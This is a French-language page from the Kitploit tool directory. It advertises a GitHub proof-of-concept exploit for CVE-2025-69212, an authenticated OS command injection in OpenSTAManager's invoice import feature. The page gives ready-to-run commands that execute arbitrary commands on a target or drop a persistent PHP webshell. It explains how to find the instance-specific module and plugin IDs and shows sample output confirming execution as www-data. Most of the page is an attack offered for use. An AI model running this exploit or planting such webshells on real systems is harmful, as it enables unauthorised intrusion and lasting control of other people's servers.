Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager Injection de commandes système PoC

Voir le dépôt
48il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69212 - Preuve de concept d'injection de commandes OS dans OpenSTAManager

Utilisation

Installer les dépendances :

root@kitploit:~
pip install -r requirements.txt

Exécuter une commande unique et afficher sa sortie :

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

Déposer un webshell PHP persistant à la place :

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Options

OptionDescription
-u, --urlURL de base de l'instance cible
-U, --usernameNom d'utilisateur pour l'authentification
-P, --passwordMot de passe pour l'authentification
-c, --commandCommande à exécuter, la sortie est sauvegardée dans pwn_out.txt
--shellDépose un webshell PHP à files/shell.php au lieu d'exécuter une commande unique
--id-moduleID du module pour la fonction d'import de factures (par défaut : 14)
--id-pluginID du plugin pour la fonction d'import de factures (par défaut : 48)

id_module et id_plugin sont spécifiques à l'instance. Si les valeurs par défaut ne fonctionnent pas, connectez-vous à l'interface web de la cible, naviguez vers la fonction d'import de factures électroniques, et vérifiez les paramètres de la requête dans l'onglet réseau de votre navigateur.

Exemple de sortie

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Télécharger l’outil